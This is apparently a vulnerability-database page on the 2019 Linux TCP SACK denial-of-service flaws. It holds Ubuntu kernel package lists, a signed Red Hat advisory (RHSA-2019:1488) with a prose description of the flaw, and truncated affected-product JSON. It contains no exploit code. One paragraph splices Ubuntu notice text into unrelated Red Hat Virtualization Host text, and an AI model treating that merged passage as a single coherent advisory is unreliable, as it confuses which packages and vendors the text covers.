Ubuntu 18.10: linux-image-4.18.0-1013-gcp 4.18.0-1013.14 linux-image-4.18.0-1014-kvm 4.18.0-1014.14 linux-image-4.18.0-1016-raspi2 4.18.0-1016.18 linux-image-4.18.0-1018-aws 4.18.0-1018.20 linux-image-4.18.0-1020-azure 4.18.0-1020.20 linux-image-4.18.0-22-generic 4.18.0-22.23 linux-image-4.18.0-22-generic-lpae 4.18.0-22.23 linux-image-4.18.0-22-lowlatency 4.18.0-22.23 linux-image-4.18.0-22-snapdragon 4.18.0-22.23 linux-image-aws 4.18.0.1018.18 linux-image-azure 4.18.0.1020.21 linux-image-gcp 4.18.0.1013.13 linux-image-generic 4.18.0.22.23 linux-image-generic-lpae 4.18.0.22.23 linux-image-gke 4.18.0.1013.13 linux-image-kvm 4.18.0.1014.14 linux-image-lowlatency 4.18.0.22.23 linux-image-raspi2 4.18.0.1016.13 linux-image-snapdragon 4.18.0.22.23 linux-image-virtual 4.18.0.22.23

Ubuntu 18.04 LTS: linux-image-4.15.0-1015-oracle 4.15.0-1015.17 linux-image-4.15.0-1034-gcp 4.15.0-1034.36 linux-image-4.15.0-1036-kvm 4.15.0-1036.36 linux-image-4.15.0-1038-raspi2 4.15.0-1038.40 linux-image-4.15.0-1041-aws 4.15.0-1041.43 linux-image-4.15.0-1043-oem 4.15.0-1043.48 linux-image-4.15.0-1055-snapdragon 4.15.0-1055.59 linux-image-4.15.0-52-generic 4.15.0-52.56 linux-image-4.15.0-52-generic-lpae 4.15.0-52.56 linux-image-4.15.0-52-lowlatency 4.15.0-52.56 linux-image-4.18.0-1020-azure 4.18.0-1020.20~18.04.1 linux-image-4.18.0-22-generic 4.18.0-22.23~18.04.1 linux-image-4.18.0-22-generic-lpae 4.18.0-22.23~18.04.1 linux-image-4.18.0-22-lowlatency 4.18.0-22.23~18.04.1 linux-image-4.18.0-22-snapdragon 4.18.0-22.23~18.04.1 linux-image-aws 4.15.0.1041.40 linux-image-azure 4.18.0.1020.19 linux-image-gcp 4.15.0.1034.36 linux-image-generic 4.15.0.52.54 linux-image-generic-hwe-18.04 4.18.0.22.72 linux-image-generic-lpae 4.15.0.52.54 linux-image-generic-lpae-hwe-18.04 4.18.0.22.72 linux-image-kvm 4.15.0.1036.36 linux-image-lowlatency 4.15.0.52.54 linux-image-lowlatency-hwe-18.04 4.18.0.22.72 linux-image-oem 4.15.0.1043.47 linux-image-oracle 4.15.0.1015.18 linux-image-raspi2 4.15.0.1038.36 linux-image-snapdragon 4.15.0.1055.58 linux-image-snapdragon-hwe-18.04 4.18.0.22.72 linux-image-virtual 4.15.0.52.54 linux-image-virtual-hwe-18.04 4.18.0.22.72

Ubuntu 16.04 LTS: linux-image-4.15.0-1015-oracle 4.15.0-1015.17~16.04.1 linux-image-4.15.0-1034-gcp 4.15.0-1034.36~16.04.1 linux-image-4.15.0-1041-aws 4.15.0-1041.43~16.04.1 linux-image-4.15.0-1047-azure 4.15.0-1047.51 linux-image-4.15.0-52-generic 4.15.0-52.56~16.04.1 linux-image-4.15.0-52-generic-lpae 4.15.0-52.56~16.04.1 linux-image-4.15.0-52-lowlatency 4.15.0-52.56~16.04.1 linux-image-4.4.0-1048-kvm 4.4.0-1048.55 linux-image-4.4.0-1085-aws 4.4.0-1085.96 linux-image-4.4.0-1111-raspi2 4.4.0-1111.120 linux-image-4.4.0-1115-snapdragon 4.4.0-1115.121 linux-image-4.4.0-151-generic 4.4.0-151.178 linux-image-4.4.0-151-generic-lpae 4.4.0-151.178 linux-image-4.4.0-151-lowlatency 4.4.0-151.178 linux-image-4.4.0-151-powerpc-e500mc 4.4.0-151.178 linux-image-4.4.0-151-powerpc-smp 4.4.0-151.178 linux-image-4.4.0-151-powerpc64-emb 4.4.0-151.178 linux-image-4.4.0-151-powerpc64-smp 4.4.0-151.178 linux-image-aws 4.4.0.1085.88 linux-image-aws-hwe 4.15.0.1041.41 linux-image-azure 4.15.0.1047.51 linux-image-gcp 4.15.0.1034.48 linux-image-generic 4.4.0.151.159 linux-image-generic-hwe-16.04 4.15.0.52.73 linux-image-generic-lpae 4.4.0.151.159 linux-image-generic-lpae-hwe-16.04 4.15.0.52.73 linux-image-gke 4.15.0.1034.48 linux-image-kvm 4.4.0.1048.48 linux-image-lowlatency 4.4.0.151.159 linux-image-lowlatency-hwe-16.04 4.15.0.52.73 linux-image-oem 4.15.0.52.73 linux-image-oracle 4.15.0.1015.9 linux-image-powerpc-e500mc 4.4.0.151.159 linux-image-powerpc-smp 4.4.0.151.159 linux-image-powerpc64-emb 4.4.0.151.159 linux-image-powerpc64-smp 4.4.0.151.159 linux-image-raspi2 4.4.0.1111.111 linux-image-snapdragon 4.4.0.1115.107 linux-image-virtual 4.4.0.151.159 linux-image-virtual-hwe-16.04 4.15.0.52.73

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.

The following packages have been upgraded to a later upstream version: redhat-release-virtualization-host (4.3.4), redhat-virtualization-host (4.3.4). 7) - aarch64, noarch, ppc64le

  1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2019:1488-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2019:1488 Issue date: 2019-06-17 CVE Names: CVE-2019-3896 CVE-2019-11477 CVE-2019-11478 CVE-2019-11479 ==================================================================== 1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 6.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64

  1. While processing SACK segments, the Linux kernel's socket buffer (SKB) data structure becomes fragmented. Each fragment is about TCP maximum segment size (MSS) bytes. To efficiently process SACK blocks, the Linux kernel merges multiple fragmented SKBs into one, potentially overflowing the variable holding the number of segments. A remote attacker could use this flaw to crash the Linux kernel by sending a crafted sequence of SACK segments on a TCP connection with small value of TCP MSS, resulting in a denial of service (DoS). (CVE-2019-11477)

  2. kernel: Double free in lib/idr.c (CVE-2019-3896)

  3. Kernel: tcp: excessive resource consumption while processing SACK blocks allows remote denial of service (CVE-2019-11478)

  4. Kernel: tcp: excessive resource consumption for TCP connections with low MSS allows remote denial of service (CVE-2019-11479)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

  • MDS mitigations not enabled on Intel Skylake CPUs (BZ#1710081)

  • RHEL6 kernel does not disable SMT with mds=full,nosmt (BZ#1710121)

  • [RHEL6] md_clear flag missing from /proc/cpuinfo (BZ#1710517)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1694812 - CVE-2019-3896 kernel: Double free in lib/idr.c 1719123 - CVE-2019-11477 Kernel: tcp: integer overflow while processing SACK blocks allows remote denial of service 1719128 - CVE-2019-11478 Kernel: tcp: excessive resource consumption while processing SACK blocks allows remote denial of service 1719129 - CVE-2019-11479 Kernel: tcp: excessive resource consumption for TCP connections with low MSS allows remote denial of service

  1. Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: kernel-2.6.32-754.15.3.el6.src.rpm

i386: kernel-2.6.32-754.15.3.el6.i686.rpm kernel-debug-2.6.32-754.15.3.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm kernel-devel-2.6.32-754.15.3.el6.i686.rpm kernel-headers-2.6.32-754.15.3.el6.i686.rpm perf-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-754.15.3.el6.noarch.rpm kernel-doc-2.6.32-754.15.3.el6.noarch.rpm kernel-firmware-2.6.32-754.15.3.el6.noarch.rpm

x86_64: kernel-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm kernel-debug-devel-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm kernel-devel-2.6.32-754.15.3.el6.x86_64.rpm kernel-headers-2.6.32-754.15.3.el6.x86_64.rpm perf-2.6.32-754.15.3.el6.x86_64.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm python-perf-2.6.32-754.15.3.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: kernel-2.6.32-754.15.3.el6.src.rpm

noarch: kernel-abi-whitelists-2.6.32-754.15.3.el6.noarch.rpm kernel-doc-2.6.32-754.15.3.el6.noarch.rpm kernel-firmware-2.6.32-754.15.3.el6.noarch.rpm

x86_64: kernel-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm kernel-debug-devel-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm kernel-devel-2.6.32-754.15.3.el6.x86_64.rpm kernel-headers-2.6.32-754.15.3.el6.x86_64.rpm perf-2.6.32-754.15.3.el6.x86_64.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

x86_64: kernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm python-perf-2.6.32-754.15.3.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source: kernel-2.6.32-754.15.3.el6.src.rpm

i386: kernel-2.6.32-754.15.3.el6.i686.rpm kernel-debug-2.6.32-754.15.3.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm kernel-devel-2.6.32-754.15.3.el6.i686.rpm kernel-headers-2.6.32-754.15.3.el6.i686.rpm perf-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-754.15.3.el6.noarch.rpm kernel-doc-2.6.32-754.15.3.el6.noarch.rpm kernel-firmware-2.6.32-754.15.3.el6.noarch.rpm

ppc64: kernel-2.6.32-754.15.3.el6.ppc64.rpm kernel-bootwrapper-2.6.32-754.15.3.el6.ppc64.rpm kernel-debug-2.6.32-754.15.3.el6.ppc64.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm kernel-debug-devel-2.6.32-754.15.3.el6.ppc64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-754.15.3.el6.ppc64.rpm kernel-devel-2.6.32-754.15.3.el6.ppc64.rpm kernel-headers-2.6.32-754.15.3.el6.ppc64.rpm perf-2.6.32-754.15.3.el6.ppc64.rpm perf-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm

s390x: kernel-2.6.32-754.15.3.el6.s390x.rpm kernel-debug-2.6.32-754.15.3.el6.s390x.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.s390x.rpm kernel-debug-devel-2.6.32-754.15.3.el6.s390x.rpm kernel-debuginfo-2.6.32-754.15.3.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-754.15.3.el6.s390x.rpm kernel-devel-2.6.32-754.15.3.el6.s390x.rpm kernel-headers-2.6.32-754.15.3.el6.s390x.rpm kernel-kdump-2.6.32-754.15.3.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-754.15.3.el6.s390x.rpm kernel-kdump-devel-2.6.32-754.15.3.el6.s390x.rpm perf-2.6.32-754.15.3.el6.s390x.rpm perf-debuginfo-2.6.32-754.15.3.el6.s390x.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.s390x.rpm

x86_64: kernel-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm kernel-debug-devel-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm kernel-devel-2.6.32-754.15.3.el6.x86_64.rpm kernel-headers-2.6.32-754.15.3.el6.x86_64.rpm perf-2.6.32-754.15.3.el6.x86_64.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm

ppc64: kernel-debug-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-754.15.3.el6.ppc64.rpm perf-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm python-perf-2.6.32-754.15.3.el6.ppc64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm

s390x: kernel-debug-debuginfo-2.6.32-754.15.3.el6.s390x.rpm kernel-debuginfo-2.6.32-754.15.3.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-754.15.3.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-754.15.3.el6.s390x.rpm perf-debuginfo-2.6.32-754.15.3.el6.s390x.rpm python-perf-2.6.32-754.15.3.el6.s390x.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.s390x.rpm

x86_64: kernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm python-perf-2.6.32-754.15.3.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: kernel-2.6.32-754.15.3.el6.src.rpm

i386: kernel-2.6.32-754.15.3.el6.i686.rpm kernel-debug-2.6.32-754.15.3.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm kernel-devel-2.6.32-754.15.3.el6.i686.rpm kernel-headers-2.6.32-754.15.3.el6.i686.rpm perf-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-754.15.3.el6.noarch.rpm kernel-doc-2.6.32-754.15.3.el6.noarch.rpm kernel-firmware-2.6.32-754.15.3.el6.noarch.rpm

x86_64: kernel-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm kernel-debug-devel-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm kernel-devel-2.6.32-754.15.3.el6.x86_64.rpm kernel-headers-2.6.32-754.15.3.el6.x86_64.rpm perf-2.6.32-754.15.3.el6.x86_64.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm python-perf-2.6.32-754.15.3.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2019-3896 https://access.redhat.com/security/cve/CVE-2019-11477 https://access.redhat.com/security/cve/CVE-2019-11478 https://access.redhat.com/security/cve/CVE-2019-11479 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/tcpsack

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBXQfbBdzjgjWX9erEAQjjiw//QtCd50n/kyijAWgyi02UAPD+QrPWRv6a gLSESiQGCl7YvWgt96eI5DANREmFMWQ8wB0LRku4KJ4tutBdTcyouWrHgHEYhXLB 24ZBi8HB/L9EhxKoQlHlY68ekZzbOcjqZhrL5K2xUnoVTJDo/+d+vtJgOIlrV/PC aXxRL5nez5Y8pjCiwqm37RP7OUnn6daLtqcu42DR9XovXqORrfJVo43+5HR0drLA ZB2B0ERUU+iFKpS6p9qIgfMLR9KRlMikeI+NRU/1JBjEDT5C4uT4fqULjM4a4QcR 4Cm+wN6ku7CTK8l+1RAKSAn12KMjHUfMhWT1X0XFTFl3lFifL6o6+5D0OVSM68xL k+E8pmoilN1nFk49Z9uLDbCJogLbPdgSOZohiuYLBfUE4IUy0OiCodmKRlQBxWTK tYBMbUQ1stywEGngsFAXnF7BIeC346+uvMT83TlfbhV+TNIFARjwx9ySNrV7hLes enTzE250yv7LaZ0tXGKhoPXfLif7nFFVNzupV1PM3uHDCjLYLRq5JQcd1IWCrBS0 IF5A/kp1X9zV8lO4fghj3aSXA7HwQphRBEJ4FkZSu34eqUX5rrC96X5T/8T9McOK iOKT/z03WI1mSBJUrU/x7N2v44mXr0kropqd/Yfqf6KQDJWW3aXkJJWxNMgBqiYS l+p3rcEBzDA=NzJu -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201906-1175",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.1.11"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.182"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "enterprise linux atomic host",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
